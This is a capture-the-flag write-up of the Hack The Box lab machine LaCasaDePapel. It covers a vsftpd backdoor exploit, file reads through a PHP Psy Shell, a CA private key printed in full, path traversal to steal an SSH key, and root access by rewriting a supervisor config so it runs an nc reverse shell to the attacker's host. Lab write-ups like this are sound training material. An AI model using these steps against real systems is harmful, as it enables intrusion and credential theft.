Hack The Box - LaCasaDePapel

Quick Summary

Hey guys today LaCasaDePapel retired and here’s my write-up about it. It was an easy interesting box, more of a ctf challenge than a realistic scenario but I still enjoyed it. It’s a Linux box and its ip is 10.10.10.131, I added it to /etc/hosts as lacasadepapel.htb. Let’s jump right in !

Nmap

As always we will start with nmap to scan for open ports and services :
nmap -sV -sT -sC lacasadepapel.htb

We have http on port 80. https on port 443, ftp on port 21 and ssh on port 22.
Anonymous authentication wasn’t allowed on ftp so I checked http and https :

1
2
3
4
5
6
7
8
9
root@kali:~/Desktop/HTB/boxes/lacasadepapel# ftp lacasadepapel.htb
Connected to lacasadepapel.htb.
220 (vsFTPd 2.3.4)
Name (lacasadepapel.htb:root): anonymous
331 Please specify the password.
Password:
530 Login incorrect.
Login failed.
ftp>

HTTP

http://lacasadepapel.htb

We see an image of the characters from LaCasaDePapel (TV show) and a QR code for OTP, I scanned it with Google Authenticator on my phone :

As you can see I had to refresh it manually while other tokens refreshed automatically, no idea why but anyway I took the OTP and used test@test.com as email :

Then nothing happened, I just got the same page back again. I tried gobuster to see if I can find any sub directories and I didn’t get anything useful. Let’s check https.
https://lacasadepapel.htb

The same background with an error message saying : “Sorry, but you need to provide a client certificate to continue.”

vsftpd 2.3.4, Psy Shell

After hitting dead ends with web, I checked the ftp service again, the version was vsftpd 2.3.4 (from the nmap scan) so I searched for exploits :

1
2
3
4
5
6
7
8
root@kali:~/Desktop/HTB/boxes/lacasadepapel# searchsploit vsftpd 2.3.4
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
vsftpd 2.3.4 - Backdoor Command Execution (Metasploit) | exploits/unix/remote/17491.rb
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result

Command Execution and there is a metasploit module for it, but the exploit didn’t work :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
msf5 > search vsftpd 2.3.4

Matching Modules
================

# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
1 auxiliary/gather/teamtalk_creds normal No TeamTalk Gather Credentials
2 exploit/multi/http/oscommerce_installer_unauth_code_exec 2018-04-30 excellent Yes osCommerce Installer Unauthenticated Code Execution
3 exploit/multi/http/struts2_namespace_ognl 2018-08-22 excellent Yes Apache Struts 2 Namespace Redirect OGNL Injection
4 exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent No VSFTPD v2.3.4 Backdoor Command Execution


msf5 > use exploit/unix/ftp/vsftpd_234_backdoor
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > show options

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target address range or CIDR identifier
RPORT 21 yes The target port (TCP)


Exploit target:

Id Name
-- ----
0 Automatic


msf5 exploit(unix/ftp/vsftpd_234_backdoor) > set rhosts 10.10.10.131
rhosts => 10.10.10.131
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > exploit

[*] 10.10.10.131:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 10.10.10.131:21 - USER: 331 Please specify the password.
[+] 10.10.10.131:21 - Backdoor service has been spawned, handling...
[-] 10.10.10.131:21 - The service on port 6200 does not appear to be a shell
[*] Exploit completed, but no session was created.
msf5 exploit(unix/ftp/vsftpd_234_backdoor) >

Apparently there was another service running on port 6200, a quick nmap scan shows that the port is open :

So I connected to that port with nc to see what’s there :

1
2
root@kali:~/Desktop/HTB/boxes/lacasadepapel# nc lacasadepapel.htb 6200
Psy Shell v0.9.9 (PHP 7.2.10 — cli) by Justin Hileman

The banner says Psy Shell v0.9.9, I didn’t know what Psy Shell was but a quick search and I found the website. It’s a shell used for interactive php debugging and we can use it to execute php.
I tried to execute system commands but I couldn’t :

1
2
3
4
exec("whoami")
PHP Fatal error: Call to undefined function exec() in Psy Shell code on line 1
system("whoami")
PHP Fatal error: Call to undefined function system() in Psy Shell code on line 1

I tried to use scandir() to see the current directory listing and it worked :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
scandir(".")
=> [
".",
"..",
".DS_Store",
"._.DS_Store",
"bin",
"boot",
"dev",
"etc",
"home",
"lib",
"lost+found",
"media",
"mnt",
"opt",
"proc",
"root",
"run",
"sbin",
"srv",
"swap",
"sys",
"tmp",
"usr",
"var",
]

I could list the directories in /home :

1
2
3
4
5
6
7
8
9
10
scandir("home/")
=> [
".",
"..",
"berlin",
"dali",
"nairobi",
"oslo",
"professor",
]

Now we know the users on the box : berlin,dali,nairobi,oslo and professor.
I found the user flag in /home/berlin, however I got permission denied when I tried to read it :

1
2
3
4
5
6
7
8
9
10
11
12
13
scandir("home/berlin")
=> [
".",
"..",
".ash_history",
".ssh",
"downloads",
"node_modules",
"server.js",
"user.txt",
]
readfile("home/berlin/user.txt")
PHP Warning: readfile(home/berlin/user.txt): failed to open stream: Permission denied in phar://eval()'d code on line 1

Same for .ssh, after a lot of failed attempts to get RCE, I looked at the help menu to see if there’s anything helpful:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
help
help Show a list of commands. Type `help [foo]` for information about [foo]. Aliases: ?
ls List local, instance or class variables, methods and constants. Aliases: list, dir
dump Dump an object or primitive.
doc Read the documentation for an object, class, constant, method or property. Aliases: rtfm, man
show Show the code for an object, class, constant, method or property.
wtf Show the backtrace of the most recent exception. Aliases: last-exception, wtf?
whereami Show where you are in the code.
throw-up Throw an exception or error out of the Psy Shell.
timeit Profiles with a timer.
trace Show the current call stack.
buffer Show (or clear) the contents of the code input buffer. Aliases: buf
clear Clear the Psy Shell screen.
edit Open an external editor. Afterwards, get produced code in input buffer.
sudo Evaluate PHP code, bypassing visibility restrictions.
history Show the Psy Shell history. Aliases: hist
exit End the current session and return to caller. Aliases: quit, q

I used ls to see what variables are there :

1
2
ls
Variables: $tokyo

There was only one variable called tokyo , let’s check that variable:

1
2
3
4
5
6
7
8
9
show $tokyo
> 2| class Tokyo {
3| private function sign($caCert,$userCsr) {
4| $caKey = file_get_contents('/home/nairobi/ca.key');
5| $userCert = openssl_csr_sign($userCsr, $caCert, $caKey, 365, ['digest_alg'=>'sha256']);
6| openssl_x509_export($userCert, $userCertOut);
7| return $userCertOut;
8| }
9| }

The function sign() is using the private key /home/nairobi/ca.key, we can grab that key and create a client certificate to access the https service we couldn’t access before.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
file_get_contents('/home/nairobi/ca.key');
=> """
-----BEGIN PRIVATE KEY-----\n
MIIEvgIBADANBgkqhkiG9w0BAQEFAASCBKgwggSkAgEAAoIBAQDPczpU3s4Pmwdb\n
7MJsi//m8mm5rEkXcDmratVAk2pTWwWxudo/FFsWAC1zyFV4w2KLacIU7w8Yaz0/\n
2m+jLx7wNH2SwFBjJeo5lnz+ux3HB+NhWC/5rdRsk07h71J3dvwYv7hcjPNKLcRl\n
uXt2Ww6GXj4oHhwziE2ETkHgrxQp7jB8pL96SDIJFNEQ1Wqp3eLNnPPbfbLLMW8M\n
YQ4UlXOaGUdXKmqx9L2spRURI8dzNoRCV3eS6lWu3+YGrC4p732yW5DM5Go7XEyp\n
s2BvnlkPrq9AFKQ3Y/AF6JE8FE1d+daVrcaRpu6Sm73FH2j6Xu63Xc9d1D989+Us\n
PCe7nAxnAgMBAAECggEAagfyQ5jR58YMX97GjSaNeKRkh4NYpIM25renIed3C/3V\n
Dj75Hw6vc7JJiQlXLm9nOeynR33c0FVXrABg2R5niMy7djuXmuWxLxgM8UIAeU89\n
1+50LwC7N3efdPmWw/rr5VZwy9U7MKnt3TSNtzPZW7JlwKmLLoe3Xy2EnGvAOaFZ\n
/CAhn5+pxKVw5c2e1Syj9K23/BW6l3rQHBixq9Ir4/QCoDGEbZL17InuVyUQcrb+\n
q0rLBKoXObe5esfBjQGHOdHnKPlLYyZCREQ8hclLMWlzgDLvA/8pxHMxkOW8k3Mr\n
uaug9prjnu6nJ3v1ul42NqLgARMMmHejUPry/d4oYQKBgQDzB/gDfr1R5a2phBVd\n
I0wlpDHVpi+K1JMZkayRVHh+sCg2NAIQgapvdrdxfNOmhP9+k3ue3BhfUweIL9Og\n
7MrBhZIRJJMT4yx/2lIeiA1+oEwNdYlJKtlGOFE+T1npgCCGD4hpB+nXTu9Xw2bE\n
G3uK1h6Vm12IyrRMgl/OAAZwEQKBgQDahTByV3DpOwBWC3Vfk6wqZKxLrMBxtDmn\n
sqBjrd8pbpXRqj6zqIydjwSJaTLeY6Fq9XysI8U9C6U6sAkd+0PG6uhxdW4++mDH\n
CTbdwePMFbQb7aKiDFGTZ+xuL0qvHuFx3o0pH8jT91C75E30FRjGquxv+75hMi6Y\n
sm7+mvMs9wKBgQCLJ3Pt5GLYgs818cgdxTkzkFlsgLRWJLN5f3y01g4MVCciKhNI\n
ikYhfnM5CwVRInP8cMvmwRU/d5Ynd2MQkKTju+xP3oZMa9Yt+r7sdnBrobMKPdN2\n
zo8L8vEp4VuVJGT6/efYY8yUGMFYmiy8exP5AfMPLJ+Y1J/58uiSVldZUQKBgBM/\n
ukXIOBUDcoMh3UP/ESJm3dqIrCcX9iA0lvZQ4aCXsjDW61EOHtzeNUsZbjay1gxC\n
9amAOSaoePSTfyoZ8R17oeAktQJtMcs2n5OnObbHjqcLJtFZfnIarHQETHLiqH9M\n
WGjv+NPbLExwzwEaPqV5dvxiU6HiNsKSrT5WTed/AoGBAJ11zeAXtmZeuQ95eFbM\n
7b75PUQYxXRrVNluzvwdHmZEnQsKucXJ6uZG9skiqDlslhYmdaOOmQajW3yS4TsR\n
aRklful5+Z60JV/5t2Wt9gyHYZ6SYMzApUanVXaWCCNVoeq+yvzId0st2DRl83Vc\n
53udBEzjt3WPqYGkkDknVhjD\n
-----END PRIVATE KEY-----\n
"""

Client Certificate Generation

First, we will create a certificate signing request (CSR) :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
root@kali:~/Desktop/HTB/boxes/lacasadepapel/cert# cat ca.key
-----BEGIN PRIVATE KEY-----
MIIEvgIBADANBgkqhkiG9w0BAQEFAASCBKgwggSkAgEAAoIBAQDPczpU3s4Pmwdb
7MJsi//m8mm5rEkXcDmratVAk2pTWwWxudo/FFsWAC1zyFV4w2KLacIU7w8Yaz0/
2m+jLx7wNH2SwFBjJeo5lnz+ux3HB+NhWC/5rdRsk07h71J3dvwYv7hcjPNKLcRl
uXt2Ww6GXj4oHhwziE2ETkHgrxQp7jB8pL96SDIJFNEQ1Wqp3eLNnPPbfbLLMW8M
YQ4UlXOaGUdXKmqx9L2spRURI8dzNoRCV3eS6lWu3+YGrC4p732yW5DM5Go7XEyp
s2BvnlkPrq9AFKQ3Y/AF6JE8FE1d+daVrcaRpu6Sm73FH2j6Xu63Xc9d1D989+Us
PCe7nAxnAgMBAAECggEAagfyQ5jR58YMX97GjSaNeKRkh4NYpIM25renIed3C/3V
Dj75Hw6vc7JJiQlXLm9nOeynR33c0FVXrABg2R5niMy7djuXmuWxLxgM8UIAeU89
1+50LwC7N3efdPmWw/rr5VZwy9U7MKnt3TSNtzPZW7JlwKmLLoe3Xy2EnGvAOaFZ
/CAhn5+pxKVw5c2e1Syj9K23/BW6l3rQHBixq9Ir4/QCoDGEbZL17InuVyUQcrb+
q0rLBKoXObe5esfBjQGHOdHnKPlLYyZCREQ8hclLMWlzgDLvA/8pxHMxkOW8k3Mr
uaug9prjnu6nJ3v1ul42NqLgARMMmHejUPry/d4oYQKBgQDzB/gDfr1R5a2phBVd
I0wlpDHVpi+K1JMZkayRVHh+sCg2NAIQgapvdrdxfNOmhP9+k3ue3BhfUweIL9Og
7MrBhZIRJJMT4yx/2lIeiA1+oEwNdYlJKtlGOFE+T1npgCCGD4hpB+nXTu9Xw2bE
G3uK1h6Vm12IyrRMgl/OAAZwEQKBgQDahTByV3DpOwBWC3Vfk6wqZKxLrMBxtDmn
sqBjrd8pbpXRqj6zqIydjwSJaTLeY6Fq9XysI8U9C6U6sAkd+0PG6uhxdW4++mDH
CTbdwePMFbQb7aKiDFGTZ+xuL0qvHuFx3o0pH8jT91C75E30FRjGquxv+75hMi6Y
sm7+mvMs9wKBgQCLJ3Pt5GLYgs818cgdxTkzkFlsgLRWJLN5f3y01g4MVCciKhNI
ikYhfnM5CwVRInP8cMvmwRU/d5Ynd2MQkKTju+xP3oZMa9Yt+r7sdnBrobMKPdN2
zo8L8vEp4VuVJGT6/efYY8yUGMFYmiy8exP5AfMPLJ+Y1J/58uiSVldZUQKBgBM/
ukXIOBUDcoMh3UP/ESJm3dqIrCcX9iA0lvZQ4aCXsjDW61EOHtzeNUsZbjay1gxC
9amAOSaoePSTfyoZ8R17oeAktQJtMcs2n5OnObbHjqcLJtFZfnIarHQETHLiqH9M
WGjv+NPbLExwzwEaPqV5dvxiU6HiNsKSrT5WTed/AoGBAJ11zeAXtmZeuQ95eFbM
7b75PUQYxXRrVNluzvwdHmZEnQsKucXJ6uZG9skiqDlslhYmdaOOmQajW3yS4TsR
aRklful5+Z60JV/5t2Wt9gyHYZ6SYMzApUanVXaWCCNVoeq+yvzId0st2DRl83Vc
53udBEzjt3WPqYGkkDknVhjD
-----END PRIVATE KEY-----
root@kali:~/Desktop/HTB/boxes/lacasadepapel/cert# openssl req -new -key ca.key -out server.csr
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [AU]:
State or Province Name (full name) [Some-State]:
Locality Name (eg, city) []:
Organization Name (eg, company) [Internet Widgits Pty Ltd]:
Organizational Unit Name (eg, section) []:
Common Name (e.g. server FQDN or YOUR name) []:lacasadepapel.htb
Email Address []:

Please enter the following 'extra' attributes
to be sent with your certificate request
A challenge password []:
An optional company name []:

Then we will use it to generate the certificate :

1
2
3
4
root@kali:~/Desktop/HTB/boxes/lacasadepapel/cert# openssl x509 -req -days 365 -in server.csr -signkey ca.key -out server.crt                                                                                      
Signature ok
subject=C = AU, ST = Some-State, O = Internet Widgits Pty Ltd, CN = lacasadepapel.htb
Getting Private key

And finally we will create a PKCS12 certificate :

1
2
3
4
root@kali:~/Desktop/HTB/boxes/lacasadepapel/cert# openssl pkcs12 -export -in server.crt -inkey ca.key -out server.p12
Enter Export Password:
Verifying - Enter Export Password:
root@kali:~/Desktop/HTB/boxes/lacasadepapel/cert#

Now we can import it to Firefox :



We have to Remove the ssl exception we gave earlier to https://lacasadepapel.htb, then we will visit it again and it will request our client certificate :

Path Traversal, Arbitrary File Download, User Flag

After gaining access we have an option to choose season 1 or season 2, clicking on one of them will take us to a page to download episodes :

As you can see in the url there is a get parameter called path, which means that the php script reads files from a given path and lists them (in this case directory : SEASON-1). If that parameter doesn’t get filtered correctly it can cause a path traversal vulnerability allowing us to list files in other directories. However listing files doesn’t help us in any way, we already can do that with Psy Shell. But if we try to download an episode, 01.avi for example :

The download link will be :

1
https://lacasadepapel.htb/file/U0VBU09OLTEvMDEuYXZp

Decoding that base-64 string we get this :

1
2
root@kali:~/Desktop/HTB/boxes/lacasadepapel# echo U0VBU09OLTEvMDEuYXZp | base64 -d 
SEASON-1/01.aviroot@kali:~/Desktop/HTB/boxes/lacasadepapel#

It uses the path to request files, let’s see where are we first :
https://lacasadepapel/?path=../

We are in berlin‘s home directory (Because the user flag is there).
https://lacasadepapel/?path=../.ssh/

Let’s download id_rsa, we know that the path is ../.ssh/id_rsa :

1
2
3
root@kali:~/Desktop/HTB/boxes/lacasadepapel# echo -n "../.ssh/id_rsa" | base64
Li4vLnNzaC9pZF9yc2E=
root@kali:~/Desktop/HTB/boxes/lacasadepapel#

-n for no new lines.

1
https://lacasadepapel.htb/file/Li4vLnNzaC9pZF9yc2E=


We found the key in berlin‘s home directory, however I couldn’t get ssh as berlin, I tried other users and professor worked :

I couldn’t read the flag as professor, so I downloaded it like I downloaded the ssh key :

1
2
3
root@kali:~/Desktop/HTB/boxes/lacasadepapel# echo -n "../user.txt" | base64
Li4vdXNlci50eHQ=
root@kali:~/Desktop/HTB/boxes/lacasadepapel#
1
https://lacasadepapel.htb/file/Li4vdXNlci50eHQ=



We owned user.

Privilege Escalation, Root Flag

In the home directory of professor there are 2 interesting files : memcached.ini and memcached.js :

1
2
3
4
5
6
7
8
9
10
lacasadepapel [~]$ ls -la
total 24
drwxr-sr-x 4 professo professo 4096 Mar 6 20:56 .
drwxr-xr-x 7 root root 4096 Feb 16 18:06 ..
lrwxrwxrwx 1 root professo 9 Nov 6 2018 .ash_history -> /dev/null
drwx------ 2 professo professo 4096 Jan 31 21:36 .ssh
-rw-r--r-- 1 root root 88 Jan 29 01:25 memcached.ini
-rw-r----- 1 root nobody 434 Jan 29 01:24 memcached.js
drwxr-sr-x 9 root professo 4096 Jan 29 01:31 node_modules
lacasadepapel [~]$

We can’t read memcached.js but we can read memecached.ini, we can’t write to both.

1
2
3
4
5
6
lacasadepapel [~]$ cat memcached.js 
cat: can't open 'memcached.js': Permission denied
lacasadepapel [~]$ cat memcached.ini
[program:memcached]
command = sudo -u nobody /usr/bin/node /home/professor/memcached.js
lacasadepapel [~]$

memcached.ini is executing this command : /usr/bin/node /home/professor/memcached.js as nobody by using sudo. Most likely it will be running as root, I ran pspy and saw that the command gets executed periodically :

The uid is 65534 which is the uid of nobody :

1
2
3
lacasadepapel [~]$ id nobody
uid=65534(nobody) gid=65534(nobody) groups=65534(nobody)
lacasadepapel [~]$

We can’t write to memcached.ini, but we can delete it and create a new one :

1
2
3
4
5
6
7
8
9
10
lacasadepapel [~]$ cat memcached.ini
[program:memcached]
command = sudo -u nobody /usr/bin/node /home/professor/memcached.js
lacasadepapel [~]$ rm memcached.ini
rm: remove 'memcached.ini'? y
lacasadepapel [~]$ vi memcached.ini
lacasadepapel [~]$ cat memcached.ini
[program:memcached]
command = /usr/bin/nc 10.10.xx.xx 1337 -e /bin/bash
lacasadepapel [~]$

I changed the command from sudo -u nobody /usr/bin/node /home/professor/memcached.js to /usr/bin/nc 10.10.xx.xx 1337 -e /bin/bash. After some seconds I got a reverse shell as root :

And we owned root !
That’s it , Feedback is appreciated !
Don’t forget to read the previous write-ups , Tweet about the write-up if you liked it , follow on twitter @Ahm3d_H3sham
Thanks for reading.

Previous Hack The Box write-up : Hack The Box - CTF
Next Hack The Box write-up : Hack The Box - Fortune